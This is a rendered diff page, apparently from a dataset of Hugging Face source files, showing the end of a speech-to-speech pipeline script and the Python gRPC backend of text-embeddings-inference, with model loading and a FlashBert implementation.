+ from arguments_classes.socket_receiver_arguments import SocketReceiverArguments
1059
+ from arguments_classes.socket_sender_arguments import SocketSenderArguments
1060
+ from arguments_classes.vad_arguments import VADHandlerArguments
1061
+ from arguments_classes.whisper_stt_arguments import WhisperSTTHandlerArguments
1062
+ from arguments_classes.melo_tts_arguments import MeloTTSHandlerArguments
1063
+ import torch
1064
+ import nltk
1065
+ from rich.console import Console
1066
+ from transformers import HfArgumentParser
1067
+ from utils.thread_manager import ThreadManager
1068
+ try:
1069
+ nltk.data.find('tokenizers/punkt_tab')
1070
+ except (LookupError, OSError):
1071
+ nltk.download('punkt_tab')
1072
+ try:
1073
+ nltk.data.find('tokenizers/averaged_perceptron_tagger_eng')
1074
+ except (LookupError, OSError):
1075
+ nltk.download('averaged_perceptron_tagger_eng')
1076
+ CURRENT_DIR = Path(__file__).resolve().parent
1077
+ os.environ['TORCHINDUCTOR_CACHE_DIR'] = os.path.join(CURRENT_DIR, 'tmp')
1078
+ console = Console()
1079
+ logging.getLogger('numba').setLevel(logging.WARNING)
1080
+
1081
+ def prepare_args(args, prefix):
1082
+ gen_kwargs = {}
1083
+ for key in copy(args.__dict__):
1084
+ if key.startswith(prefix):
1085
+ value = args.__dict__.pop(key)
1086
+ new_key = key[len(prefix) + 1:]
1087
+ if new_key.startswith('gen_'):
1088
+ gen_kwargs[new_key[4:]] = value
1089
+ else:
1090
+ args.__dict__[new_key] = value
1091
+ args.__dict__['gen_kwargs'] = gen_kwargs
1092
+
1093
+ def main():
1094
+ parser = HfArgumentParser((ModuleArguments, SocketReceiverArguments, SocketSenderArguments, VADHandlerArguments, WhisperSTTHandlerArguments, ParaformerSTTHandlerArguments, LanguageModelHandlerArguments, MLXLanguageModelHandlerArguments, ParlerTTSHandlerArguments, MeloTTSHandlerArguments, ChatTTSHandlerArguments))
1095
+ if len(sys.argv) == 2 and sys.argv[1].endswith('.json'):
1096
+ (module_kwargs, socket_receiver_kwargs, socket_sender_kwargs, vad_handler_kwargs, whisper_stt_handler_kwargs, paraformer_stt_handler_kwargs, language_model_handler_kwargs, mlx_language_model_handler_kwargs, parler_tts_handler_kwargs, melo_tts_handler_kwargs, chat_tts_handler_kwargs) = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
1097
+ else:
1098
+ (module_kwargs, socket_receiver_kwargs, socket_sender_kwargs, vad_handler_kwargs, whisper_stt_handler_kwargs, paraformer_stt_handler_kwargs, language_model_handler_kwargs, mlx_language_model_handler_kwargs, parler_tts_handler_kwargs, melo_tts_handler_kwargs, chat_tts_handler_kwargs) = parser.parse_args_into_dataclasses()
1099
+ global logger
1100
+ logging.basicConfig(level=module_kwargs.log_level.upper(), format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
1101
+ logger = logging.getLogger(__name__)
1102
+ if module_kwargs.log_level == 'debug':
1103
+ torch._logging.set_logs(graph_breaks=True, recompiles=True, cudagraphs=True)
1104
+
1105
+ def optimal_mac_settings(mac_optimal_settings: Optional[str], *handler_kwargs):
1106
+ if mac_optimal_settings:
1107
+ for kwargs in handler_kwargs:
1108
+ if hasattr(kwargs, 'device'):
1109
+ kwargs.device = 'mps'
1110
+ if hasattr(kwargs, 'mode'):
1111
+ kwargs.mode = 'local'
1112
+ if hasattr(kwargs, 'stt'):
1113
+ kwargs.stt = 'whisper-mlx'
1114
+ if hasattr(kwargs, 'llm'):
1115
+ kwargs.llm = 'mlx-lm'
1116
+ if hasattr(kwargs, 'tts'):
1117
+ kwargs.tts = 'melo'
1118
+ optimal_mac_settings(module_kwargs.local_mac_optimal_settings, module_kwargs)
1119
+ if platform == 'darwin':
1120
+ if module_kwargs.device == 'cuda':
1121
+ raise ValueError("Cannot use CUDA on macOS. Please set the device to 'cpu' or 'mps'.")
1122
+ if module_kwargs.llm != 'mlx-lm':
1123
+ logger.warning('For macOS users, it is recommended to use mlx-lm. You can activate it by passing --llm mlx-lm.')
1124
+ if module_kwargs.tts != 'melo':
1125
+ logger.warning('If you experiences issues generating the voice, considering setting the tts to melo.')
1126
+
1127
+ def overwrite_device_argument(common_device: Optional[str], *handler_kwargs):
1128
+ if common_device:
1129
+ for kwargs in handler_kwargs:
1130
+ if hasattr(kwargs, 'lm_device'):
1131
+ kwargs.lm_device = common_device
1132
+ if hasattr(kwargs, 'tts_device'):
1133
+ kwargs.tts_device = common_device
1134
+ if hasattr(kwargs, 'stt_device'):
1135
+ kwargs.stt_device = common_device
1136
+ if hasattr(kwargs, 'paraformer_stt_device'):
1137
+ kwargs.paraformer_stt_device = common_device
1138
+ overwrite_device_argument(module_kwargs.device, language_model_handler_kwargs, mlx_language_model_handler_kwargs, parler_tts_handler_kwargs, whisper_stt_handler_kwargs, paraformer_stt_handler_kwargs)
1139
+ prepare_args(whisper_stt_handler_kwargs, 'stt')
1140
+ prepare_args(paraformer_stt_handler_kwargs, 'paraformer_stt')
1141
+ prepare_args(language_model_handler_kwargs, 'lm')
1142
+ prepare_args(mlx_language_model_handler_kwargs, 'mlx_lm')
1143
+ prepare_args(parler_tts_handler_kwargs, 'tts')
1144
+ prepare_args(melo_tts_handler_kwargs, 'melo')
1145
+ prepare_args(chat_tts_handler_kwargs, 'chat_tts')
1146
+ stop_event = Event()
1147
+ should_listen = Event()
1148
+ recv_audio_chunks_queue = Queue()
1149
+ send_audio_chunks_queue = Queue()
1150
+ spoken_prompt_queue = Queue()
1151
+ text_prompt_queue = Queue()
1152
+ lm_response_queue = Queue()
1153
+ if module_kwargs.mode == 'local':
1154
+ from connections.local_audio_streamer import LocalAudioStreamer
1155
+ local_audio_streamer = LocalAudioStreamer(input_queue=recv_audio_chunks_queue, output_queue=send_audio_chunks_queue)
1156
+ comms_handlers = [local_audio_streamer]
1157
+ should_listen.set()
1158
+ else:
1159
+ from connections.socket_receiver import SocketReceiver
1160
+ from connections.socket_sender import SocketSender
1161
+ comms_handlers = [SocketReceiver(stop_event, recv_audio_chunks_queue, should_listen, host=socket_receiver_kwargs.recv_host, port=socket_receiver_kwargs.recv_port, chunk_size=socket_receiver_kwargs.chunk_size), SocketSender(stop_event, send_audio_chunks_queue, host=socket_sender_kwargs.send_host, port=socket_sender_kwargs.send_port)]
1162
+ vad = VADHandler(stop_event, queue_in=recv_audio_chunks_queue, queue_out=spoken_prompt_queue, setup_args=(should_listen,), setup_kwargs=vars(vad_handler_kwargs))
1163
+ if module_kwargs.stt == 'whisper':
1164
+ from STT.whisper_stt_handler import WhisperSTTHandler
1165
+ stt = WhisperSTTHandler(stop_event, queue_in=spoken_prompt_queue, queue_out=text_prompt_queue, setup_kwargs=vars(whisper_stt_handler_kwargs))
1166
+ elif module_kwargs.stt == 'whisper-mlx':
1167
+ from STT.lightning_whisper_mlx_handler import LightningWhisperSTTHandler
1168
+ stt = LightningWhisperSTTHandler(stop_event, queue_in=spoken_prompt_queue, queue_out=text_prompt_queue, setup_kwargs=vars(whisper_stt_handler_kwargs))
1169
+ elif module_kwargs.stt == 'paraformer':
1170
+ from STT.paraformer_handler import ParaformerSTTHandler
1171
+ stt = ParaformerSTTHandler(stop_event, queue_in=spoken_prompt_queue, queue_out=text_prompt_queue, setup_kwargs=vars(paraformer_stt_handler_kwargs))
1172
+ else:
1173
+ raise ValueError('The STT should be either whisper, whisper-mlx, or paraformer.')
1174
+ if module_kwargs.llm == 'transformers':
1175
+ from LLM.language_model import LanguageModelHandler
1176
+ lm = LanguageModelHandler(stop_event, queue_in=text_prompt_queue, queue_out=lm_response_queue, setup_kwargs=vars(language_model_handler_kwargs))
1177
+ elif module_kwargs.llm == 'mlx-lm':
1178
+ from LLM.mlx_language_model import MLXLanguageModelHandler
1179
+ lm = MLXLanguageModelHandler(stop_event, queue_in=text_prompt_queue, queue_out=lm_response_queue, setup_kwargs=vars(mlx_language_model_handler_kwargs))
1180
+ else:
1181
+ raise ValueError('The LLM should be either transformers or mlx-lm')
1182
+ if module_kwargs.tts == 'parler':
1183
+ from TTS.parler_handler import ParlerTTSHandler
1184
+ tts = ParlerTTSHandler(stop_event, queue_in=lm_response_queue, queue_out=send_audio_chunks_queue, setup_args=(should_listen,), setup_kwargs=vars(parler_tts_handler_kwargs))
1185
+ elif module_kwargs.tts == 'melo':
1186
+ try:
1187
+ from TTS.melo_handler import MeloTTSHandler
1188
+ except RuntimeError as e:
1189
+ logger.error('Error importing MeloTTSHandler. You might need to run: python -m unidic download')
1190
+ raise e
1191
+ tts = MeloTTSHandler(stop_event, queue_in=lm_response_queue, queue_out=send_audio_chunks_queue, setup_args=(should_listen,), setup_kwargs=vars(melo_tts_handler_kwargs))
1192
+ elif module_kwargs.tts == 'chatTTS':
1193
+ try:
1194
+ from TTS.chatTTS_handler import ChatTTSHandler
1195
+ except RuntimeError as e:
1196
+ logger.error('Error importing ChatTTSHandler')
1197
+ raise e
1198
+ tts = ChatTTSHandler(stop_event, queue_in=lm_response_queue, queue_out=send_audio_chunks_queue, setup_args=(should_listen,), setup_kwargs=vars(chat_tts_handler_kwargs))
1199
+ else:
1200
+ raise ValueError('The TTS should be either parler, melo or chatTTS')
1201
+ try:
1202
+ pipeline_manager = ThreadManager([*comms_handlers, vad, stt, lm, tts])
1203
+ pipeline_manager.start()
1204
+ except KeyboardInterrupt:
1205
+ pipeline_manager.stop()
1206
+ if __name__ == '__main__':
1207
+ main()
1208
+
huggingface_text-embeddings-inference.txt ADDED
@@ -0,0 +1,385 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/cli.py
2
+ import sys
3
+ import typer
4
+ from pathlib import Path
5
+ from loguru import logger
6
+ from typing import Optional
7
+ from enum import Enum
8
+ app = typer.Typer()
9
+
10
+ class Dtype(str, Enum):
11
+ float32 = 'float32'
12
+ float16 = 'float16'
13
+ bloat16 = 'bfloat16'
14
+
15
+ @app.command()
16
+ def serve(model_path: Path, dtype: Dtype='float32', uds_path: Path='/tmp/text-embeddings-server', logger_level: str='INFO', json_output: bool=False, otlp_endpoint: Optional[str]=None, otlp_service_name: str='text-embeddings-inference.server'):
17
+ logger.remove()
18
+ logger.add(sys.stdout, format='{message}', filter='text_embeddings_server', level=logger_level, serialize=json_output, backtrace=True, diagnose=False)
19
+ from text_embeddings_server import server
20
+ from text_embeddings_server.utils.tracing import setup_tracing
21
+ if otlp_endpoint is not None:
22
+ setup_tracing(otlp_endpoint=otlp_endpoint, otlp_service_name=otlp_service_name)
23
+ dtype = None if dtype is None else dtype.value
24
+ server.serve(model_path, dtype, uds_path)
25
+ if __name__ == '__main__':
26
+ app()
27
+
28
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/__init__.py
29
+ import torch
30
+ from loguru import logger
31
+ from pathlib import Path
32
+ from typing import Optional
33
+ from transformers import AutoConfig
34
+ from transformers.models.bert import BertConfig
35
+ from text_embeddings_server.models.model import Model
36
+ from text_embeddings_server.models.default_model import DefaultModel
37
+ __all__ = ['Model']
38
+ torch.set_grad_enabled(False)
39
+ FLASH_ATTENTION = True
40
+ try:
41
+ from text_embeddings_server.models.flash_bert import FlashBert
42
+ except ImportError as e:
43
+ logger.warning(f'Could not import Flash Attention enabled models: {e}')
44
+ FLASH_ATTENTION = False
45
+ if FLASH_ATTENTION:
46
+ __all__.append(FlashBert)
47
+
48
+ def get_model(model_path: Path, dtype: Optional[str]):
49
+ if dtype == 'float32':
50
+ dtype = torch.float32
51
+ elif dtype == 'float16':
52
+ dtype = torch.float16
53
+ elif dtype == 'bfloat16':
54
+ dtype = torch.bfloat16
55
+ else:
56
+ raise RuntimeError(f'Unknown dtype {dtype}')
57
+ if torch.cuda.is_available():
58
+ device = torch.device('cuda')
59
+ else:
60
+ if dtype != torch.float32:
61
+ raise ValueError('CPU device only supports float32 dtype')
62
+ device = torch.device('cpu')
63
+ config = AutoConfig.from_pretrained(model_path)
64
+ if config.model_type == 'bert':
65
+ config: BertConfig
66
+ if device.type == 'cuda' and config.position_embedding_type == 'absolute' and (dtype in [torch.float16, torch.bfloat16]) and FLASH_ATTENTION:
67
+ return FlashBert(model_path, device, dtype)
68
+ else:
69
+ return DefaultModel(model_path, device, dtype)
70
+ raise NotImplementedError
71
+
72
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/default_model.py
73
+ import inspect
74
+ import torch
75
+ from pathlib import Path
76
+ from typing import Type, List
77
+ from transformers import AutoModel
78
+ from opentelemetry import trace
79
+ from text_embeddings_server.models import Model
80
+ from text_embeddings_server.models.types import PaddedBatch, Embedding
81
+ tracer = trace.get_tracer(__name__)
82
+
83
+ class DefaultModel(Model):
84
+
85
+ def __init__(self, model_path: Path, device: torch.device, dtype: torch.dtype):
86
+ model = AutoModel.from_pretrained(model_path).to(dtype).to(device)
87
+ self.hidden_size = model.config.hidden_size
88
+ self.has_position_ids = inspect.signature(model.forward).parameters.get('position_ids', None) is not None
89
+ self.has_token_type_ids = inspect.signature(model.forward).parameters.get('token_type_ids', None) is not None
90
+ super(DefaultModel, self).__init__(model=model, dtype=dtype, device=device)
91
+
92
+ @property
93
+ def batch_type(self) -> Type[PaddedBatch]:
94
+ return PaddedBatch
95
+
96
+ @tracer.start_as_current_span('embed')
97
+ def embed(self, batch: PaddedBatch) -> List[Embedding]:
98
+ kwargs = {'input_ids': batch.input_ids, 'attention_mask': batch.attention_mask}
99
+ if self.has_token_type_ids:
100
+ kwargs['token_type_ids'] = batch.token_type_ids
101
+ if self.has_position_ids:
102
+ kwargs['position_ids'] = batch.position_ids
103
+ output = self.model(**kwargs)
104
+ embedding = output[0][:, 0]
105
+ cpu_results = embedding.view(-1).tolist()
106
+ return [Embedding(values=cpu_results[i * self.hidden_size:(i + 1) * self.hidden_size]) for i in range(len(batch))]
107
+
108
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/flash_bert.py
109
+ import torch
110
+ from pathlib import Path
111
+ from torch import nn
112
+ from typing import Type, List
113
+ from safetensors import safe_open
114
+ from transformers.activations import ACT2FN
115
+ from transformers.models.bert import BertConfig
116
+ from opentelemetry import trace
117
+ import dropout_layer_norm
118
+ from text_embeddings_server.models import Model
119
+ from text_embeddings_server.models.types import FlashBatch, Embedding
120
+ from text_embeddings_server.utils.flash_attn import attention
121
+ tracer = trace.get_tracer(__name__)
122
+
123
+ class FastLayerNorm:
124
+
125
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
126
+ self.weight = handle.get_tensor(f'{prefix}.weight').to(dtype).to(device)
127
+ self.bias = handle.get_tensor(f'{prefix}.bias').to(dtype).to(device)
128
+ self.variance_epsilon = config.layer_norm_eps
129
+
130
+ def forward(self, hidden_states, residual=None):
131
+ (normed_hidden_states, res, *rest) = dropout_layer_norm.dropout_add_ln_fwd(hidden_states, residual, self.weight, self.bias, None, None, None, None, 0.0, self.variance_epsilon, 1.0, 0, None, False, False)
132
+ if res is None:
133
+ res = hidden_states
134
+ return (normed_hidden_states, res)
135
+
136
+ class BertEmbeddings:
137
+
138
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
139
+ self.word_embeddings_weight = handle.get_tensor(f'{prefix}.word_embeddings.weight').to(dtype).to(device)
140
+ self.token_type_embeddings_weight = handle.get_tensor(f'{prefix}.token_type_embeddings.weight').to(dtype).to(device)
141
+ if config.position_embedding_type == 'absolute':
142
+ self.position_embeddings_weight = handle.get_tensor(f'{prefix}.position_embeddings.weight').to(dtype).to(device)
143
+ else:
144
+ raise NotImplementedError('FlashBert only supports absolute position embeddings')
145
+ self.layer_norm = FastLayerNorm(f'{prefix}.LayerNorm', handle, device, dtype, config)
146
+
147
+ def forward(self, input_ids, token_type_ids, position_ids):
148
+ inputs_embeds = nn.functional.embedding(input_ids, self.word_embeddings_weight)
149
+ token_type_embeds = nn.functional.embedding(token_type_ids, self.token_type_embeddings_weight)
150
+ position_embeds = nn.functional.embedding(position_ids, self.position_embeddings_weight)
151
+ inputs_embeds += position_embeds
152
+ (embeddings, _) = self.layer_norm.forward(inputs_embeds, token_type_embeds)
153
+ return embeddings
154
+
155
+ class BertAttention:
156
+
157
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
158
+ query_weight = handle.get_tensor(f'{prefix}.self.query.weight')
159
+ query_bias = handle.get_tensor(f'{prefix}.self.query.bias')
160
+ key_weight = handle.get_tensor(f'{prefix}.self.key.weight')
161
+ key_bias = handle.get_tensor(f'{prefix}.self.key.bias')
162
+ value_weight = handle.get_tensor(f'{prefix}.self.value.weight')
163
+ value_bias = handle.get_tensor(f'{prefix}.self.value.bias')
164
+ self.qkv_weight = torch.cat([query_weight, key_weight, value_weight]).T.to(dtype).to(device)
165
+ self.qkv_bias = torch.cat([query_bias, key_bias, value_bias]).to(dtype).to(device)
166
+ self.dense_weight = handle.get_tensor(f'{prefix}.output.dense.weight').T.to(dtype).to(device)
167
+ self.dense_bias = handle.get_tensor(f'{prefix}.output.dense.bias').to(dtype).to(device)
168
+ self.layer_norm = FastLayerNorm(f'{prefix}.output.LayerNorm', handle, device, dtype, config)
169
+ self.head_size = config.hidden_size // config.num_attention_heads
170
+ self.softmax_scale = self.head_size ** (-0.5)
171
+ self.num_heads = config.num_attention_heads
172
+
173
+ def forward(self, hidden_states, cu_seqlens, max_s):
174
+ residual = hidden_states
175
+ qkv = torch.addmm(self.qkv_bias, hidden_states, self.qkv_weight)
176
+ (q, k, v) = qkv.view(-1, self.num_heads * 3, self.head_size).split(self.num_heads, dim=1)
177
+ attn_output = torch.empty_like(q)
178
+ attention(q, k, v, attn_output, cu_seqlens, max_s, self.softmax_scale)
179
+ hidden_states = torch.addmm(self.dense_bias, attn_output.view(-1, self.num_heads * self.head_size), self.dense_weight)
180
+ (hidden_states, _) = self.layer_norm.forward(hidden_states, residual)
181
+ return hidden_states
182
+
183
+ class BertLayer:
184
+
185
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
186
+ self.attention = BertAttention(f'{prefix}.attention', handle, device, dtype, config)
187
+ self.intermediate_weight = handle.get_tensor(f'{prefix}.intermediate.dense.weight').T.to(dtype).to(device)
188
+ self.intermediate_bias = handle.get_tensor(f'{prefix}.intermediate.dense.bias').to(dtype).to(device)
189
+ act = config.hidden_act
190
+ self.intermediate_act_fn = ACT2FN[act] if 'gelu' not in act else lambda x: torch.nn.functional.gelu(x, approximate='tanh' if act in ['gelu_fast', 'gelu_pytorch_tanh'] else 'none')
191
+ self.output_weight = handle.get_tensor(f'{prefix}.output.dense.weight').T.to(dtype).to(device)
192
+ self.output_bias = handle.get_tensor(f'{prefix}.output.dense.bias').to(dtype).to(device)
193
+ self.layer_norm = FastLayerNorm(f'{prefix}.output.LayerNorm', handle, device, dtype, config)
194
+
195
+ def forward(self, hidden_states, cu_seqlens, max_s):
196
+ hidden_states = self.attention.forward(hidden_states, cu_seqlens, max_s)
197
+ residual = hidden_states
198
+ hidden_states = torch.addmm(self.intermediate_bias, hidden_states, self.intermediate_weight)
199
+ hidden_states = self.intermediate_act_fn(hidden_states)
200
+ hidden_states = torch.addmm(self.output_bias, hidden_states, self.output_weight)
201
+ (hidden_states, _) = self.layer_norm.forward(hidden_states, residual)
202
+ return hidden_states
203
+
204
+ class BertEncoder:
205
+
206
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
207
+ self.layers = [BertLayer(f'{prefix}.layer.{i}', handle, device, dtype, config) for i in range(config.num_hidden_layers)]
208
+
209
+ def forward(self, hidden_states, cu_seqlens, max_s):
210
+ for layer in self.layers:
211
+ hidden_states = layer.forward(hidden_states, cu_seqlens, max_s)
212
+ return hidden_states
213
+
214
+ class FlashBertModel:
215
+
216
+ def __init__(self, handle, device, dtype, config: BertConfig):
217
+ self.embeddings = BertEmbeddings('embeddings', handle, device, dtype, config)
218
+ self.encoder = BertEncoder('encoder', handle, device, dtype, config)
219
+
220
+ def forward(self, input_ids, token_type_ids, position_ids, cu_seqlens, max_s):
221
+ embeddings = self.embeddings.forward(input_ids, token_type_ids, position_ids)
222
+ encoder_outputs = self.encoder.forward(embeddings, cu_seqlens, max_s)
223
+ return encoder_outputs[cu_seqlens[:-1]]
224
+
225
+ class FlashBert(Model):
226
+
227
+ def __init__(self, model_path: Path, device: torch.device, dtype: torch.dtype):
228
+ config = BertConfig.from_pretrained(model_path)
229
+ with safe_open(model_path / 'model.safetensors', framework='pt') as f:
230
+ model = FlashBertModel(f, device, dtype, config)
231
+ self.hidden_size = config.hidden_size
232
+ super(FlashBert, self).__init__(model=model, dtype=dtype, device=device)
233
+
234
+ @property
235
+ def batch_type(self) -> Type[FlashBatch]:
236
+ return FlashBatch
237
+
238
+ @tracer.start_as_current_span('embed')
239
+ def embed(self, batch: FlashBatch) -> List[Embedding]:
240
+ embedding = self.model.forward(input_ids=batch.input_ids, token_type_ids=batch.token_type_ids, position_ids=batch.position_ids, cu_seqlens=batch.cu_seqlens, max_s=batch.max_s)
241
+ cpu_results = embedding.view(-1).tolist()
242
+ return [Embedding(values=cpu_results[i * self.hidden_size:(i + 1) * self.hidden_size]) for i in range(len(batch))]
243
+
244
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/model.py
245
+ import torch
246
+ from abc import ABC, abstractmethod
247
+ from typing import List, TypeVar, Type
248
+ from text_embeddings_server.models.types import Batch, Embedding
249
+ B = TypeVar('B', bound=Batch)
250
+
251
+ class Model(ABC):
252
+
253
+ def __init__(self, model, dtype: torch.dtype, device: torch.device):
254
+ self.model = model
255
+ self.dtype = dtype
256
+ self.device = device
257
+
258
+ @property
259
+ @abstractmethod
260
+ def batch_type(self) -> Type[B]:
261
+ raise NotImplementedError
262
+
263
+ @abstractmethod
264
+ def embed(self, batch: B) -> List[Embedding]:
265
+ raise NotImplementedError
266
+
267
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/types.py
268
+ import torch
269
+ from abc import ABC, abstractmethod
270
+ from dataclasses import dataclass
271
+ from opentelemetry import trace
272
+ from text_embeddings_server.pb import embed_pb2
273
+ from text_embeddings_server.pb.embed_pb2 import Embedding
274
+ tracer = trace.get_tracer(__name__)
275
+
276
+ class Batch(ABC):
277
+
278
+ @classmethod
279
+ @abstractmethod
280
+ def from_pb(cls, pb: embed_pb2.EmbedRequest, device: torch.device) -> 'Batch':
281
+ raise NotImplementedError
282
+
283
+ @abstractmethod
284
+ def __len__(self):
285
+ raise NotImplementedError
286
+
287
+ @dataclass
288
+ class PaddedBatch(Batch):
289
+ input_ids: torch.Tensor
290
+ token_type_ids: torch.Tensor
291
+ position_ids: torch.Tensor
292
+ attention_mask: torch.Tensor
293
+
294
+ @classmethod
295
+ @tracer.start_as_current_span('from_pb')
296
+ def from_pb(cls, pb: embed_pb2.EmbedRequest, device: torch.device) -> 'PaddedBatch':
297
+ all_tensors = torch.zeros([4, len(pb.cu_seq_lengths) - 1, pb.max_length], dtype=torch.int32)
298
+ for (i, start_index) in enumerate(pb.cu_seq_lengths[:-1]):
299
+ end_index = pb.cu_seq_lengths[i + 1]
300
+ input_length = end_index - start_index
301
+ all_tensors[0, i, :input_length] = torch.tensor(pb.input_ids[start_index:end_index], dtype=torch.int32)
302
+ all_tensors[1, i, :input_length] = torch.tensor(pb.token_type_ids[start_index:end_index], dtype=torch.int32)
303
+ all_tensors[2, i, :input_length] = torch.tensor(pb.position_ids[start_index:end_index], dtype=torch.int32)
304
+ all_tensors[3, i, :input_length] = 1
305
+ all_tensors = all_tensors.to(device)
306
+ return PaddedBatch(input_ids=all_tensors[0], token_type_ids=all_tensors[1], position_ids=all_tensors[2], attention_mask=all_tensors[3])
307
+
308
+ def __len__(self):
309
+ return len(self.input_ids)
310
+
311
+ @dataclass
312
+ class FlashBatch(Batch):
313
+ input_ids: torch.Tensor
314
+ token_type_ids: torch.Tensor
315
+ position_ids: torch.Tensor
316
+ cu_seqlens: torch.Tensor
317
+ max_s: int
318
+ size: int
319
+
320
+ @classmethod
321
+ @tracer.start_as_current_span('from_pb')
322
+ def from_pb(cls, pb: embed_pb2.EmbedRequest, device: torch.device) -> 'FlashBatch':
323
+ if device.type != 'cuda':
324
+ raise RuntimeError(f'FlashBatch does not support device {device}')
325
+ batch_input_ids = torch.tensor(pb.input_ids, dtype=torch.int32, device=device)
326
+ batch_token_type_ids = torch.tensor(pb.token_type_ids, dtype=torch.int32, device=device)
327
+ batch_position_ids = torch.tensor(pb.position_ids, dtype=torch.int32, device=device)
328
+ cu_seqlens = torch.tensor(pb.cu_seq_lengths, dtype=torch.int32, device=device)
329
+ return FlashBatch(input_ids=batch_input_ids, token_type_ids=batch_token_type_ids, position_ids=batch_position_ids, cu_seqlens=cu_seqlens, max_s=pb.max_length, size=len(cu_seqlens) - 1)
330
+
331
+ def __len__(self):
332
+ return self.size
333
+
334
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/server.py
335
+ import asyncio
336
+ import torch
337
+ from grpc import aio
338
+ from loguru import logger
339
+ from grpc_reflection.v1alpha import reflection
340
+ from pathlib import Path
341
+ from typing import Optional
342
+ from text_embeddings_server.models import Model, get_model
343
+ from text_embeddings_server.pb import embed_pb2_grpc, embed_pb2
344
+ from text_embeddings_server.utils.tracing import UDSOpenTelemetryAioServerInterceptor
345
+ from text_embeddings_server.utils.interceptor import ExceptionInterceptor
346
+
347
+ class EmbeddingService(embed_pb2_grpc.EmbeddingServiceServicer):
348
+
349
+ def __init__(self, model: Model):
350
+ self.model = model
351
+ self._inference_mode_raii_guard = torch._C._InferenceMode(True)
352
+
353
+ async def Health(self, request, context):
354
+ if self.model.device.type == 'cuda':
355
+ torch.zeros((2, 2), device='cuda')
356
+ return embed_pb2.HealthResponse()
357
+
358
+ async def Embed(self, request, context):
359
+ batch = self.model.batch_type.from_pb(request, self.model.device)
360
+ embeddings = self.model.embed(batch)
361
+ return embed_pb2.EmbedResponse(embeddings=embeddings)
362
+
363
+ def serve(model_path: Path, dtype: Optional[str], uds_path: Path):
364
+
365
+ async def serve_inner(model_path: Path, dtype: Optional[str]=None):
366
+ unix_socket = f'unix://{uds_path}'
367
+ try:
368
+ model = get_model(model_path, dtype)
369
+ except Exception:
370
+ logger.exception('Error when initializing model')
371
+ raise
372
+ server = aio.server(interceptors=[ExceptionInterceptor(), UDSOpenTelemetryAioServerInterceptor()])
373
+ embed_pb2_grpc.add_EmbeddingServiceServicer_to_server(EmbeddingService(model), server)
374
+ SERVICE_NAMES = (embed_pb2.DESCRIPTOR.services_by_name['EmbeddingService'].full_name, reflection.SERVICE_NAME)
375
+ reflection.enable_server_reflection(SERVICE_NAMES, server)
376
+ server.add_insecure_port(unix_socket)
377
+ await server.start()
378
+ logger.info(f'Server started at {unix_socket}')
379
+ try:
380
+ await server.wait_for_termination()
381
+ except KeyboardInterrupt:
382
+ logger.info('Signal received. Shutting down')
383
+ await server.stop(0)
384
+ asyncio.run(serve_inner(model_path, dtype))
385
+
huggingface_text-generation-inference.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_tokenizers.txt ADDED
@@ -0,0 +1,1157 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
